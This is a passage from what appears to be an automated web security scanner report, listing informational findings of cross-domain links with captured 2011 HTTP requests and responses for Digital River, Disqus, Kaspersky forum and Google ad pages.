http://bcove.me/phdjojzi
http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome
http://t2.trackalyzer.com/trackalyze.js
http://www.goglobalocity.com/
http://www.twitter.com/digitalriverinc
https://cm.commerce5.com/
https://cp.element5.com/

Request

GET /store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740 HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131233612263,0)
Date: Sun, 04 Sep 2011 14:17:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app58
Content-Length: 67513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<li><a href="https://cm.commerce5.com">Commerce Manager</a>
...[SNIP]...
<li><a href="https://cp.element5.com">element 5</a>
...[SNIP]...
<div id="headTwitter"><a id="twitter" href="http://www.twitter.com/digitalriverinc" target="_blank"><img alt="Twitter" title="Twitter" src="/DRHM/Storefront/Site/digriv/cm/images/little_twit_icon.gif" />
...[SNIP]...
<li>
                           <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=94762&p=irol-irhome" onmouseover="showSubNavContent(3,5);">Investor Relations</a>
...[SNIP]...
<map name="globalocitymap">
   <area shape="rect" coords="814,21,924,52" href="http://www.goglobalocity.com" alt="" />
</map>
...[SNIP]...
<div id="twitter_follow_box">
                       <a href="http://www.twitter.com/digitalriverinc" target="_blank"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/twitter_follow.gif" alt="follow us on twitter">
...[SNIP]...
<div id="twitter_join">
                           <a href="http://www.twitter.com/digitalriverinc" target="_blank">Join the<br>
...[SNIP]...
</div>
                       <a href="http://bcove.me/phdjojzi" class="home_video_link" title="Transparent Commerce"><img id="home_video_play" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/pb/images/HomePage/videoThumb_TransparentCommerce.jpg" alt="blog">
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

15.20. http://disqus.com/forums/scmagazine/popular_threads_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/forums/scmagazine/popular_threads_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://disqus.com/forums/scmagazine/popular_threads_widget.js?num_items=10

The response contains the following links to other domains:

http://www.scmagazine.com.au/News/265780,bitcoin-botnet-mines-over-twitter.aspx
http://www.scmagazine.com.au/News/266427,stealing-the-census.aspx
http://www.scmagazine.com.au/News/266531,users-try-to-snare-nz-govt-with-own-three-strikes-law.aspx
http://www.scmagazine.com.au/News/267479,jailbroken-idevices-pwned-by-charging-stations.aspx
http://www.scmagazine.com.au/News/268799,death-worm-phones-home-over-dns.aspx
http://www.scmagazine.com.au/News/268898,anonymous-attacked-wikileaks.aspx

Request

GET /forums/scmagazine/popular_threads_widget.js?num_items=10 HTTP/1.1
Host: disqus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315097127.1315100729.3; __utmz=113869458.1315100729.3.3.utmcsr=blog.inetu.net|utmccn=(referral)|utmcmd=referral|utmcct=/2009/05/top-5-ways-to-hack-into-your-web-application-and-how-to-close-those-security-loopholes/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Content-Length: 2362
Date: Sun, 04 Sep 2011 12:12:51 GMT
X-Varnish: 530754133 530300349
Age: 329
Via: 1.1 varnish
Connection: close

document.write(' \
<style type="text/css" media="screen">\
    .dsq-widget ul.dsq-widget-list {\
    padding: 0;\
    margin: 0;\
    text-align: left;\
    }\
    img.dsq-widget-avatar {\
    border: 0px;\
    ma
...[SNIP]...
<li class="dsq-widget-item">\
    <a class="dsq-widget-thread" href="http://www.scmagazine.com.au/News/268799,death-worm-phones-home-over-dns.aspx">Death worm phones home over DNS</a>
...[SNIP]...
<li class="dsq-widget-item">\
    <a class="dsq-widget-thread" href="http://www.scmagazine.com.au/News/268898,anonymous-attacked-wikileaks.aspx">Anonymous attacked WikiLeaks </a>
...[SNIP]...
<li class="dsq-widget-item">\
    <a class="dsq-widget-thread" href="http://www.scmagazine.com.au/News/267479,jailbroken-idevices-pwned-by-charging-stations.aspx">Jailbroken idevices pwned by charging stations</a>
...[SNIP]...
<li class="dsq-widget-item">\
    <a class="dsq-widget-thread" href="http://www.scmagazine.com.au/News/266427,stealing-the-census.aspx">Stealing the Census</a>
...[SNIP]...
<li class="dsq-widget-item">\
    <a class="dsq-widget-thread" href="http://www.scmagazine.com.au/News/266531,users-try-to-snare-nz-govt-with-own-three-strikes-law.aspx">Users try to snare NZ Govt with own three strikes law</a>
...[SNIP]...
<li class="dsq-widget-item">\
    <a class="dsq-widget-thread" href="http://www.scmagazine.com.au/News/265780,bitcoin-botnet-mines-over-twitter.aspx">Bitcoin botnet mines over Twitter </a>
...[SNIP]...

15.21. http://disqus.com/forums/scmagazine/recent_comments_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/forums/scmagazine/recent_comments_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://disqus.com/forums/scmagazine/recent_comments_widget.js?num_items=5&hide_avatars=1&avatar_size=32&excerpt_length=200

The response contains the following links to other domains:

http://www.scmagazine.com.au/News/157053,dell-latitude-z-puts-security-front-and-centre.aspx
http://www.scmagazine.com.au/News/268799,death-worm-phones-home-over-dns.aspx
http://www.scmagazine.com.au/News/268898,anonymous-attacked-wikileaks.aspx
http://www.scmagazine.com.au/News/268981,mikko-hypponens-20-years-of-cyber-crime-fighting.aspx
http://www.scmagazine.com.au/Review/261702,metricstream-risk-management-solution.aspx

Request

GET /forums/scmagazine/recent_comments_widget.js?num_items=5&hide_avatars=1&avatar_size=32&excerpt_length=200 HTTP/1.1
Host: disqus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315097127.1315100729.3; __utmz=113869458.1315100729.3.3.utmcsr=blog.inetu.net|utmccn=(referral)|utmcmd=referral|utmcct=/2009/05/top-5-ways-to-hack-into-your-web-application-and-how-to-close-those-security-loopholes/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Content-Length: 3991
Date: Sun, 04 Sep 2011 12:12:51 GMT
X-Varnish: 530754064 530588996
Age: 118
Via: 1.1 varnish
Connection: close

document.write(' \
<style type="text/css" media="screen">\
    .dsq-widget ul.dsq-widget-list {\
    padding: 0;\
    margin: 0;\
    text-align: left;\
    }\
    img.dsq-widget-avatar {\
    width: 32px;\
    he
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazine.com.au/News/268981,mikko-hypponens-20-years-of-cyber-crime-fighting.aspx">Mikko Hypponen's 20 years of cyber crime fighting</a> · <a href="http://www.scmagazine.com.au/News/268981,mikko-hypponens-20-years-of-cyber-crime-fighting.aspx#comment-301162940">1 day ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazine.com.au/News/268799,death-worm-phones-home-over-dns.aspx">Death worm phones home over DNS</a> · <a href="http://www.scmagazine.com.au/News/268799,death-worm-phones-home-over-dns.aspx#comment-300757679">2 days ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazine.com.au/News/268898,anonymous-attacked-wikileaks.aspx">Anonymous attacked WikiLeaks </a> · <a href="http://www.scmagazine.com.au/News/268898,anonymous-attacked-wikileaks.aspx#comment-300554300">2 days ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazine.com.au/Review/261702,metricstream-risk-management-solution.aspx">MetricStream Risk Management Solution</a> · <a href="http://www.scmagazine.com.au/Review/261702,metricstream-risk-management-solution.aspx#comment-294978883">1 week ago</a>
...[SNIP]...
<p class="dsq-widget-meta"><a href="http://www.scmagazine.com.au/News/157053,dell-latitude-z-puts-security-front-and-centre.aspx">Dell Latitude Z puts security front and centre</a> · <a href="http://www.scmagazine.com.au/News/157053,dell-latitude-z-puts-security-front-and-centre.aspx#comment-293147854">1 week ago</a>
...[SNIP]...

15.22. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://forum.kaspersky.com/index.php?showforum=5

The response contains the following links to other domains:

http://forum.kasperskyclub.com/
http://mc.yandex.ru/metrika/watch.js
http://mc.yandex.ru/watch/7260883
http://www.invisionboard.com/
http://www.invisionpower.com/

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:00:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: session_id=82c6300bfd526a46875731ac58df8e9e; path=/
Set-Cookie: forum_read=a%3A1%3A%7Bi%3A5%3Bi%3A1315144835%3B%7D; expires=Mon, 03 Sep 2012 14:00:35 GMT; path=/
Vary: Accept-Encoding
Content-Length: 74964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
<div class='ipb-top-left-link'><a href="http://forum.kasperskyclub.com/">Kaspersky Lab's Fan Club</a>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...
<div><img src="//mc.yandex.ru/watch/7260883" style="position:absolute; left:-9999px;" alt="" /></div>
...[SNIP]...
<div align='center' class='copyright'>
Powered By <a href='http://www.invisionboard.com' style='text-decoration:none' target='_blank'>IP.Board</a>
© 2011  <a href='http://www.invisionpower.com' style='text-decoration:none' target='_blank'>IPS, Inc</a>
...[SNIP]...

15.23. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315163667&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html&dt=1315145667732&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315145667845&frm=4&adk=1607234649&ga_vid=1465475066.1315145668&ga_sid=1315145668&ga_hid=849475373&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=284&biw=1033&bih=894&eid=36887102&fu=0&ifi=1&dtd=245&xpc=QlLdMrIDQr&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/expansion_embed.js
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dlincolndealer.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNE9RICZwLqUjZp1-KVtJhk1xnUqHQ

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315163667&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html&dt=1315145667732&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315145667845&frm=4&adk=1607234649&ga_vid=1465475066.1315145668&ga_sid=1315145668&ga_hid=849475373&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=284&biw=1033&bih=894&eid=36887102&fu=0&ifi=1&dtd=245&xpc=QlLdMrIDQr&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 14:13:50 GMT
Server: cafe
Cache-Control: private
Content-Length: 4021
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/expansion_embed.js"></script>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dlincolndealer.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNE9RICZwLqUjZp1-KVtJhk1xnUqHQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

15.24. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4358676377058562&format=120x240_as&output=html&h=240&w=120&lmt=1315156423&channel=0946045135&ad_type=text_image&color_bg=ffcc99&color_border=ffcc99&color_link=0000FF&color_text=000000&color_url=008000&flash=10.3.183&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&dt=1315138423699&bpp=36&shv=r20110824&jsv=r20110719&correlator=1315138423737&frm=4&adk=3061909479&ga_vid=2110831794.1315138425&ga_sid=1315138425&ga_hid=1381620674&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=13&ady=149&biw=1233&bih=1037&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=1&dtd=1008&xpc=U9qyh8YELT&p=http%3A//lwn.net

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lwn.net/Articles/456878/%26hl%3Den%26client%3Dca-pub-4358676377058562%26adU%3Dwww.Google.com/AdWords%26adT%3DFree%2BOnline%2BAdvertising%26gl%3DUS&usg=AFQjCNEehJr46awPJ5oWqVgzM5WbjT6Tjw

Request

GET /pagead/ads?client=ca-pub-4358676377058562&format=120x240_as&output=html&h=240&w=120&lmt=1315156423&channel=0946045135&ad_type=text_image&color_bg=ffcc99&color_border=ffcc99&color_link=0000FF&color_text=000000&color_url=008000&flash=10.3.183&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&dt=1315138423699&bpp=36&shv=r20110824&jsv=r20110719&correlator=1315138423737&frm=4&adk=3061909479&ga_vid=2110831794.1315138425&ga_sid=1315138425&ga_hid=1381620674&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=13&ady=149&biw=1233&bih=1037&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=1&dtd=1008&xpc=U9qyh8YELT&p=http%3A//lwn.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.25. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4634662068732588&output=html&h=600&slotname=1430840992&w=120&lmt=1315156453&flash=10.3.183&url=http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FphpMyAdmin-updates-close-XSS-hole-1331093.html&dt=1315138453371&bpp=58&shv=r20110824&jsv=r20110719&prev_slotnames=0615220379&correlator=1315138450900&frm=4&adk=442370836&ga_vid=1241471896.1315138451&ga_sid=1315138451&ga_hid=277447158&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=helvetica&dfs=16&adx=1001&ady=120&biw=1217&bih=1037&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=2&dtd=146&xpc=vQIk7QBRaO&p=http%3A//www.h-online.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html%26hl%3Den%26client%3Dca-pub-4634662068732588%26adU%3Dwww.Infoblox.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNExSVoGlgmpYur9knExXp4ZsrLSjA

Request

GET /pagead/ads?client=ca-pub-4634662068732588&output=html&h=600&slotname=1430840992&w=120&lmt=1315156453&flash=10.3.183&url=http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FphpMyAdmin-updates-close-XSS-hole-1331093.html&dt=1315138453371&bpp=58&shv=r20110824&jsv=r20110719&prev_slotnames=0615220379&correlator=1315138450900&frm=4&adk=442370836&ga_vid=1241471896.1315138451&ga_sid=1315138451&ga_hid=277447158&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=helvetica&dfs=16&adx=1001&ady=120&biw=1217&bih=1037&eid=36887102&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=2&dtd=146&xpc=vQIk7QBRaO&p=http%3A//www.h-online.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.26. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1313965654&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2F4.16.2011-xss-cross-site-scripting-dork-poc-example-report-vulnerable-server.html&dt=1315139700374&bpp=28&shv=r20110824&jsv=r20110719&correlator=1315139700415&frm=4&adk=1607234649&ga_vid=1520838230.1315139700&ga_sid=1315139700&ga_hid=1936672634&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1049&bih=910&ref=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&fu=0&ifi=1&dtd=45&xpc=HQEB98vPlM&p=http%3A//xss.cx

The response contains the following links to other domains:

http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/4.16.2011-xss-cross-site-scripting-dork-poc-example-report-vulnerable-server.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.google.com/AdWords%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGlkB4Bft2ebtQqnbM89Hd-0cuHEA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1313965654&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2F4.16.2011-xss-cross-site-scripting-dork-poc-example-report-vulnerable-server.html&dt=1315139700374&bpp=28&shv=r20110824&jsv=r20110719&correlator=1315139700415&frm=4&adk=1607234649&ga_vid=1520838230.1315139700&ga_sid=1315139700&ga_hid=1936672634&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1049&bih=910&ref=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&fu=0&ifi=1&dtd=45&xpc=HQEB98vPlM&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 12:34:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 4332
X-XSS-Protection: 1; mode=block

